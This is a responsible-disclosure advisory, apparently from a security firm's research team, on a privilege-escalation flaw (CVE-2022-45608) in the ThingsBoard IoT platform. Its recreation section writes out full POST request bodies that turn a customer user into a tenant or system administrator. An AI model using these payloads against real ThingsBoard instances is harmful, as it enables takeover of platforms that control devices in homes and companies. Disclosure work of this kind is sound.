Responsible disclosure: access control vulnerability discovered in the ThingsBoard IoT platform

On December 2022, a security researcher from the Outpost24 Ghost Labs team discovered a vulnerability on the ThingsBoard IoT platform, where a normal user’s privileges can be escalated, by doing a simple post with an additional header, and exploiting the associated flaws, to take control over the entire platform and related accounts. Upon reporting of the vulnerability to the vendor, it was quickly resolved. While the communication has been largely monodirectional, the time to resolution and patch was swift. It is always a pleasure to see a development team taking user security so seriously.

In the latest version of the product, the vulnerability has been remediated. We strongly urge users of the platform to upgrade to the latest version. This is of extra importance for anyone who does not have control of all end users, as an initial access is needed to obtain the increased permissions.

ThingsBoard Vulnerability summary

  • Product: ThingsBoard IoT platform
  • Affected version(s): v3.4.2 (December 1, 2022) and possibly older
  • CVE-ID: 2022-45608

Vulnerability description

The ThingsBoard IoT platform was affected by a vertical privilege escalation vulnerability.

A low privileged user (CUSTOMER_USER) was able to escalate his privileges (vertically) and become Administrator (TENANT_ADMIN) or system administrator (SYS_ADMIN) on the web application using a simple POST request with the platform’s REST API.

In order to exploit the vulnerability, the attacker would need to know the corresponding API’s parameter (“authority”:“value”) and default user UUIDs, which can be easily identified from ThingsBoard’s official GitHub repository.

Vulnerability impact

Through our test on the latest version of the platform, we have reason to believe that all customers are affected.

Recreation flow

To verify the vulnerability, these steps were taken by our security researcher:

  1. Login under the cloud edition or install the affected ThingsBoard version (3.4.2) on your onpremises.
    Affected versions:

    1. ThingsBoard Professional Edition Cloud
    2. ThingsBoard Community Edition
    3. ThingsBoard Professional Edition
  2. After you signup and login into your main ThingsBoard dashboard, intercept the outgoing POST request, and modify the ‘authority’ value. In this example, we will escalate to a tenant administrator.

Getting Tenant Administrator access: POST

https://<thingsboardinstance>/api/user?sendActivationMail=false

{
“id”:
    {
        “entityType”: “USER”,
        “id”: “XXXXXXXXX”
    },
    “createdTime”: 0,
    “additionalInfo”:
    {
        “lastLoginTs”: 1668422898320,
        “failedLoginAttempts“: 0,
        “userCredentialsEnabled”: true,
        “lang”: “en_US”,
        “homeDashboardHideToolbar”: false
    },
    “tenantId”:
    {
        “entityType”: “TENANT”,
        “id”: “XXXXXXXXXX”
    },
    “email”: winston@foo.com, “authority”: “TENANT_ADMIN”, “firstName”: “Winston”, “lastName”: null,
    “name”: winston@foo.com,
    “language”: “en_US”,
    “homeDashboardHideToolbar”: false
}

Getting System Administrator access: POST

https://<thingsboardinstance>/api/user?sendActivationMail=false

{
“id”:
    {
        “entityType”: “USER”,
        “id”: “XXXXXXXXX”
    },
    “createdTime”: 0,
    “additionalInfo”:
    {
        “description”: “”,
        “defaultDashboardId”: null,
        “defaultDashboardFullscreen”: false,
        “homeDashboardId”: null,
        “homeDashboardHideToolbar”: false,
        “userCredentialsEnabled”: true,
        “failedLoginAttempts”: 0,
        “lang”: “en_US”
    },
    “tenantId”:
    {
        “entityType”: “TENANT”,
        “id”: “13814000-1dd2-11b2-8080-808080808080”
    },
    “email”: john@foo.com, “authority”: “SYS_ADMIN”, “firstName”: “John”, “lastName”: “Wick”,
    “name”: john@foo.com,
    “language”: “en_US”,
    “homeDashboardId”: null,
    “homeDashboardHideToolbar”: false
}

Screenshots

In following screenshots, you can see how the low-level user is able to access admin resources.

Here’s the low-level user and his original ID and token:

Responsible disclosure - Access control vulnerability in ThingsBoard
Responsible disclosure - Access control vulnerability in ThingsBoard

Here’s the information that the low-level user can access:

information that the low-level user can access
after the user escalates permissions to Tenant Admin

Here is what it looks like after the user escalates permissions to Tenant Admin:

access control
access control vulnerability
after the user escalates permissions to Tenant Admin
after the user escalates permissions to Tenant Admin

Remediation

To remediate this vulnerability, update to the latest version of the ThingsBoard IoT platform.

Lessons learned

Any vulnerability in a solution that is used to remotely control devices in homes or companies, brings a risk of enabling a pivoting point into those other networks. We have seen this in recent examples of supply chain attacks, most notably, the 2020 SolarWinds breach.

If you are an organization that grants access to information via web applications, proactive security testing is key. Beyond testing and auditing your own solution, you need to ensure that your vendors and MSPs are doing the same. Outpost24 provides security solutions to reduce your attack surface. Whether you are an application provider, or MSP, our experts our ready to help you with your security program.

About Ghost Labs

ghost labs logo

Ghost Labs is the specialist security unit within Outpost24 working in partnership with our clients to meet their penetration testing needs and objectives. Our experienced Offensive Security team offers enhanced and bespoke penetration testing security services such as advanced network penetration testing, (web)application testing, Red Teaming assessments and complex web application exploitation to help organizations have a true picture of their cyber risk. In addition, the Ghost Labs team is an active contributor to the security community with vulnerability research and coordinated responsible disclosure program.

Ghost Labs performs hundreds of successful penetration tests for its customers ranging from global enterprises to SMEs. Our team consists of highly skilled ethical hackers, covering a wide range of advanced testing services to help companies keep up with evolving threats and new technologies. To help businesses drive security maturity and mitigate risks posed by the evolving threat and techniques of the modern day hacker.

About the Author

Fotios Liatsis Senior Security Consultant, Outpost24

Fotios is a Senior Security Consultant with 10 years of experience in cyber security, information security, and IT operations. He excels at identifying system and network vulnerabilities, conducting comprehensive penetration tests, and executing red team engagements and adversarial simulation assessments.